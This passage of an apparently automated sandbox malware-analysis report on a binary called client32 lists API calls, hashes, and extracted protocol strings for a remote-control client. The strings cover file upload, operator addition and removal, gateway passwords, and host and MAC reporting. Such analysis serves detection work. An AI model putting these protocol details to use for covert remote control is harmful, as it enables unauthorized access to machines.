                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        • CallWindowProcA.USER32(?,?,?,?,?), ref: 1115B55A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
                                                                                                                                        • String ID: ..\ctl32\wndclass.cpp$old_wndproc
                                                                                                                                        • API String ID: 1777853711-3305400014
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6892232A,?,68917F44,?,000000BC,?), ref: 68921D00
                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6892232A,?,68917F44,?,000000BC,?), ref: 68921D29
                                                                                                                                        • GetACP.KERNEL32(?,?,6892232A,?,68917F44,?,000000BC,?), ref: 68921D3D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F5290: CloseHandle.KERNEL32(00000000,688F5678), ref: 688F529A
                                                                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,nextfileindex,00000001,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F54A7
                                                                                                                                        Strings
                                                                                                                                        • C:\Users\user\AppData\Roaming\Cisco\Support\, xrefs: 688F54BB, 688F54C6
                                                                                                                                        • htctl.packet_tracing, xrefs: 688F54A2
                                                                                                                                        • C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini, xrefs: 688F5496
                                                                                                                                        • nextfileindex, xrefs: 688F549D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandlePrivateProfile
                                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\Cisco\Support\$C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini$htctl.packet_tracing$nextfileindex
                                                                                                                                        • API String ID: 3401662979-31437938
                                                                                                                                        APIs
                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 68918BA8
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 68918BBD
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(6893427C), ref: 68918BC8
                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 68918BE4
                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 68918BEB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2579439406-0
                                                                                                                                        • Opcode ID: 122d669dee120e502b3f971bff547ff8ee5d6d1c9daf7446763489c9478426ef
                                                                                                                                        • Instruction ID: 54245b40e83dafccd110f2329ae8e7ebcf076d48249555c2b786dfaf74346818
                                                                                                                                        • Opcode Fuzzy Hash: 122d669dee120e502b3f971bff547ff8ee5d6d1c9daf7446763489c9478426ef
                                                                                                                                        • Instruction Fuzzy Hash: 262199B882C208DFDF70DF69E5A8A4C3BB8FB1A314F40415AE94997384E7B49991CF45
                                                                                                                                        APIs
                                                                                                                                        • __time64.LIBCMT ref: 1101D213
                                                                                                                                        • SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 1101D232
                                                                                                                                        • GetLocalTime.KERNEL32(00000002), ref: 1101D25C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LocalRectTime__time64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 394334608-0
                                                                                                                                        • Opcode ID: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                                        • Instruction ID: 290189b485d165d605b85d0a399bd35ca550a15b876ac08f977e3d1591b43d19
                                                                                                                                        • Opcode Fuzzy Hash: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                                        • Instruction Fuzzy Hash: 01316C75904B44DFD320CF68D944B9AFBE8EB48714F00896EE86AC7780DB34E904CB51
                                                                                                                                        APIs
                                                                                                                                        • EnumSystemLocalesA.KERNEL32(Function_00031DB6,00000001), ref: 68922164
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2099609381-0
                                                                                                                                        • Opcode ID: 7fd294ad1fb48d33134785c5398c565300649b37e42b4deab272460708932a6c
                                                                                                                                        • Instruction ID: 23148bef0e375d982fb140e1a3f493016fb60d9a752640c29e43c3dccd1990cb
                                                                                                                                        • Opcode Fuzzy Hash: 7fd294ad1fb48d33134785c5398c565300649b37e42b4deab272460708932a6c
                                                                                                                                        • Instruction Fuzzy Hash: DDD0C970A647069BEB24CE64C608B65BAE4EB42B19F908B0CDA97854C5D775E0848640
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_fseek$__fsopen_free_memset
                                                                                                                                        • String ID: CMD=PUTFILE$DATA=$FLEN=%d$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$MORE=%d$OFFSET=%d$ON=%s$PWD=%s$SUB=%s$ctl_putfile - _filelength FAILED (error: %d)$ctl_putfile - _topen FAILED (error: %d)$ctl_putfile - empty file (%s)$putfile - _read FAILED (error: %d)
                                                                                                                                        • API String ID: 908761794-2149975586
                                                                                                                                        • Opcode ID: 99ef52c176f2f90fd3195d158afd0d92038640b6076463ac565c01a9cbbc5cec
                                                                                                                                        • Instruction ID: 78f6deb5d220d389fcafb5be63f920ca4dba0ccb1601893fd517f008638e8f72
                                                                                                                                        • Opcode Fuzzy Hash: 99ef52c176f2f90fd3195d158afd0d92038640b6076463ac565c01a9cbbc5cec
                                                                                                                                        • Instruction Fuzzy Hash: 69B194B5D04228ABDB20DBF8CC44FEEB778AF95308F904559E514A7241EB31DA45CFA1
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688FD1BA
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000300,000000FF,00000001,00000000), ref: 688FD1E1
                                                                                                                                          • Part of subcall function 68907BE0: _memset.LIBCMT ref: 68907BFF
                                                                                                                                          • Part of subcall function 68907BE0: _strncpy.LIBCMT ref: 68907C0B
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 688FD212
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FD223
                                                                                                                                          • Part of subcall function 688F8C30: _memset.LIBCMT ref: 688F8C5B
                                                                                                                                          • Part of subcall function 688F8C30: _free.LIBCMT ref: 688F8CCC
                                                                                                                                          • Part of subcall function 688F8B50: _memset.LIBCMT ref: 688F8B68
                                                                                                                                          • Part of subcall function 688F8B50: wsprintfA.USER32 ref: 688F8B87
                                                                                                                                        • _free.LIBCMT ref: 688FD39A
                                                                                                                                        • _strncpy.LIBCMT ref: 688FD3C9
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FD4D5
                                                                                                                                        • _free.LIBCMT ref: 688FD53F
                                                                                                                                        • _free.LIBCMT ref: 688FD545
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 688FD573
                                                                                                                                        • _free.LIBCMT ref: 688FD5C8
                                                                                                                                        • Sleep.KERNEL32(00000064,?,?,?,?), ref: 688FD5DC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$_memset$CriticalSectionSleep_strncpy$EnterLeaveObjectSingleWait__vswprintf_mallocwsprintf
                                                                                                                                        • String ID: 1.1$305090$CLIENT_IP_ADDRESS=%s$CLIENT_IP_ADDRESS=0.0.0.0$CLIENT_NAME=%s$CMD=CTL_CONNECT$CONTROL_NAME=%s$GSK=%s$Gateway_Gsk$Gateway_Password$Gateway_Username$HOSTNAME=%s$MACADDRESS=%s$PROTOCOL_VER=%u.%u$PWD=%s$USER=%s
                                                                                                                                        • API String ID: 2732282590-827811004
                                                                                                                                        • Opcode ID: 6f3a5753a125217334967c2b27ee1866e5a56673c056d8ca444a05974ff614e0
                                                                                                                                        • Instruction ID: f02f3c215ba585f19fddfbe85b7c5af881415809be36ecf9803a132a44e6676b
                                                                                                                                        • Opcode Fuzzy Hash: 6f3a5753a125217334967c2b27ee1866e5a56673c056d8ca444a05974ff614e0
                                                                                                                                        • Instruction Fuzzy Hash: 17E1E7B5D44628AFCB21CF68CC40FEEB778AF8A304F844599E61D67240E735AA41CF91
                                                                                                                                        APIs
                                                                                                                                        • operator+.LIBCMT ref: 6892B25D
                                                                                                                                          • Part of subcall function 6892836C: DName::DName.LIBCMT ref: 6892837F
                                                                                                                                          • Part of subcall function 6892836C: DName::operator+.LIBCMT ref: 68928386
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameName::Name::operator+operator+
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2937105810-0
                                                                                                                                        • Opcode ID: bdba24d19413db602aefc3c00b0068f579fa47848bb6e4ece00853a94454206d
                                                                                                                                        • Instruction ID: a7f3c3fc6fa8183f1a31f813eef3c129a4f19645ad571f44537cc2b5ae0bfff6
                                                                                                                                        • Opcode Fuzzy Hash: bdba24d19413db602aefc3c00b0068f579fa47848bb6e4ece00853a94454206d
                                                                                                                                        • Instruction Fuzzy Hash: 6ED13D75920209EFDF04DFA8C8A5AEEBBF8EF19314F804066E511EB255DB30DA45CB61
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 689051AD
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 6890522C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 68905245
                                                                                                                                        • _free.LIBCMT ref: 68905348
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 689053DD
                                                                                                                                        • _memset.LIBCMT ref: 689053F4
                                                                                                                                        • _free.LIBCMT ref: 68905448
                                                                                                                                          • Part of subcall function 68907B60: _sprintf.LIBCMT ref: 68907B77
                                                                                                                                          • Part of subcall function 689077E0: _free.LIBCMT ref: 689077EF
                                                                                                                                        • _free.LIBCMT ref: 689054AC
                                                                                                                                        • _free.LIBCMT ref: 689054BB
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689054C9
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689054D3
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 689054E9
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68905512
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 6890554D
                                                                                                                                        • _free.LIBCMT ref: 689053A3
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 6890556E
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 6890557D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$CriticalSection$CountEnterErrorLastLeaveTick_memset$FreeHeapSleep__vswprintf_malloc_sprintf
                                                                                                                                        • String ID: CMD=ADDOPERATOR$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$NEWFN=%s$NEWON=%s$NEWPERMS=%u$NEWPWD=%s$ON=%s$PWD=%s$W$ctl_addoperator - INVALID PARAMETER
                                                                                                                                        • API String ID: 4103114184-1141881251
                                                                                                                                        • Opcode ID: d8a124654367520c97dd26384a9eed880b88d13857110077ab66c144b5280837
                                                                                                                                        • Instruction ID: b1ceda3e02d6c877c951f12700fa5725d793cb178c8eaed7ce632f4ba54602e5
                                                                                                                                        • Opcode Fuzzy Hash: d8a124654367520c97dd26384a9eed880b88d13857110077ab66c144b5280837
                                                                                                                                        • Instruction Fuzzy Hash: 51B187B5D44229AFDB20DBA8CC80FEE77B8AF54304F8044A9E55977141E770EA84CFA1
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688FCDF0
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,00000000,?), ref: 688FCE13
                                                                                                                                        • InterlockedIncrement.KERNEL32(-6893CB16), ref: 688FCE29
                                                                                                                                        • InterlockedIncrement.KERNEL32(-6893CB86), ref: 688FCE2F
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FCE36
                                                                                                                                        • _free.LIBCMT ref: 688FCF2C
                                                                                                                                        • _free.LIBCMT ref: 688FCFD7
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FD029
                                                                                                                                        • _free.LIBCMT ref: 688FD0CA
                                                                                                                                        • _free.LIBCMT ref: 688FD109
                                                                                                                                        • _free.LIBCMT ref: 688FD115
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$CriticalIncrementInterlockedSection$EnterErrorFreeHeapLastLeave__vswprintf_malloc_memset
                                                                                                                                        • String ID: APPTYPE=%d$CMD=CTL_BROWSE$CONTEXT=%s$CSPEC=%s$CTLTYPE=%d$GSK$GSK=%s$Gateway_Gsk$Gateway_Name$Gateway_Password$Gateway_Username$MATCH_NAME=%s$PWD=%s$REQHOSTNAME=1$REQUSERNAME=1$SERVICETYPE=CLASS$SERVICETYPE=DEPT$USER=%s$WANTSHELP=1
                                                                                                                                        • API String ID: 2543302378-3410294771
                                                                                                                                        • Opcode ID: 5c1d8e401c2b1a7ed44eb107a93f78a37948a32d31b925458ba739946885d95e
                                                                                                                                        • Instruction ID: d536eb4324138aa2a4f791681352ecf5147cbdfa40413ed7da7af1566cb210f0
                                                                                                                                        • Opcode Fuzzy Hash: 5c1d8e401c2b1a7ed44eb107a93f78a37948a32d31b925458ba739946885d95e
                                                                                                                                        • Instruction Fuzzy Hash: 74919676C4022AABCB30DBA4CC40FFE7778AF55204F8448E9E51977541EB31AA85CFA4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 689075B0: _malloc.LIBCMT ref: 689075D8
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FBF22
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FBF51
                                                                                                                                        • _free.LIBCMT ref: 688FBF7C
                                                                                                                                        • _free.LIBCMT ref: 688FC005
                                                                                                                                        • _free.LIBCMT ref: 688FC034
                                                                                                                                        • _free.LIBCMT ref: 688FC063
                                                                                                                                        • _free.LIBCMT ref: 688FC109
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$_malloc$ErrorFreeHeapLast__vswprintf
                                                                                                                                        • String ID: APPTYPE=%d$BFLG=%d$DA=%d$DATA=$DEPT=%s$ED=%s$ID=%d$MO=%d$OC=%d$SD=%s$TIMING=%d$TM=%s$TZ=%d$UID=%s$UN=%s$WD=%u$WP=%d$YR=%d
                                                                                                                                        • API String ID: 2888336863-1668223812
                                                                                                                                        • Opcode ID: be8666a358fc411c9c9267e4ce52eaa4bfb3ad62e64ff6b7ef0da93b5825c1e1
                                                                                                                                        • Instruction ID: f317e8d7f474b8cc92e2adac619dc1eb9adc2b75d354470f77935bc9921550ce
                                                                                                                                        • Opcode Fuzzy Hash: be8666a358fc411c9c9267e4ce52eaa4bfb3ad62e64ff6b7ef0da93b5825c1e1
                                                                                                                                        • Instruction Fuzzy Hash: A55131B95402287BE7119F25CC80F7F73BCEFA5658F80941CF92996601EB35E90187B5
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 688FA617
                                                                                                                                        • inet_ntoa.WSOCK32(00000000), ref: 688FA623
                                                                                                                                        • _sprintf.LIBCMT ref: 688FA65D
                                                                                                                                        • _free.LIBCMT ref: 688FA663
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 688FA6AC
                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 688FA6D0
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688FA6F9
                                                                                                                                        • Sleep.KERNEL32(00000064,?,?,?,00000000,00000000,?,?,688FACF4,00000000,00000000,?,?,00000010,00000002,00000001), ref: 688FA711
                                                                                                                                        • GetModuleFileNameA.KERNEL32 ref: 688FA7B5
                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,?,?,688FACF4,00000000,00000000), ref: 688FA8E9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLast$AddressCreateModuleNameProcSleep_free_sprintfinet_ntoawsprintf
                                                                                                                                        • String ID: Proxy-Authenticate: Basic$$CONNECT %s:%d HTTP/1.1Host:%s:%d%s$ConnResp247.tmp$Error %d sending HTTP request$Error %d writing inet request$InternetWriteFile$Proxy-Authorization: BASIC %s$Support\
                                                                                                                                        • API String ID: 1677068198-3755747204
                                                                                                                                        • Opcode ID: 75c19d84b3a9bfeaaa91721e62384e7a2a5b36839b3d47f56e0b8b8f7d5d83d7
                                                                                                                                        • Instruction ID: 835307487e819cd19107bb09d7ff7ab726740f4f66cfecd1c15fc8c3fe7f3071
                                                                                                                                        • Opcode Fuzzy Hash: 75c19d84b3a9bfeaaa91721e62384e7a2a5b36839b3d47f56e0b8b8f7d5d83d7
                                                                                                                                        • Instruction Fuzzy Hash: 46B10435A082199FCB20CF54DC58FEAB3B4EF8A355F4184B9E959A7250DB30AD85CF90
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 689055D7
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 6890564C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 6890566B
                                                                                                                                        • _free.LIBCMT ref: 68905743
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 689057C4
                                                                                                                                        • _free.LIBCMT ref: 689057CD
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689057DB
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689057E8
                                                                                                                                        • Sleep.KERNEL32(00000014,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 689057FE
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68905824
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68905862
                                                                                                                                        • _free.LIBCMT ref: 6890578D
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                          • Part of subcall function 68907B60: _sprintf.LIBCMT ref: 68907B77
                                                                                                                                          • Part of subcall function 689077E0: _free.LIBCMT ref: 689077EF
                                                                                                                                        • _free.LIBCMT ref: 68905880
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 6890588C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$CriticalSection$CountEnterErrorLastLeaveTick$FreeHeapSleep__vswprintf_malloc_memset_sprintf
                                                                                                                                        • String ID: CMD=REMOVEOPERATOR$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$ON=%s$PWD=%s$REMON=%s$W$ctl_removeoperator - INVALID PARAMETER
                                                                                                                                        • API String ID: 2014206688-1244755732
                                                                                                                                        • Opcode ID: 0418f40422abc0996183713d4d71d91bf0f3d783df6322423ce489242653baad
                                                                                                                                        • Instruction ID: 4e995525da347e99858430cb697555e8352e22b94e95b2f1feba13b769ccda80
                                                                                                                                        • Opcode Fuzzy Hash: 0418f40422abc0996183713d4d71d91bf0f3d783df6322423ce489242653baad
                                                                                                                                        • Instruction Fuzzy Hash: 5F918275D04218AFDB10DFE8CC44BEE77B9AF85308F904429E919AB241EB71D945CF61
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$_memset$lstrlen
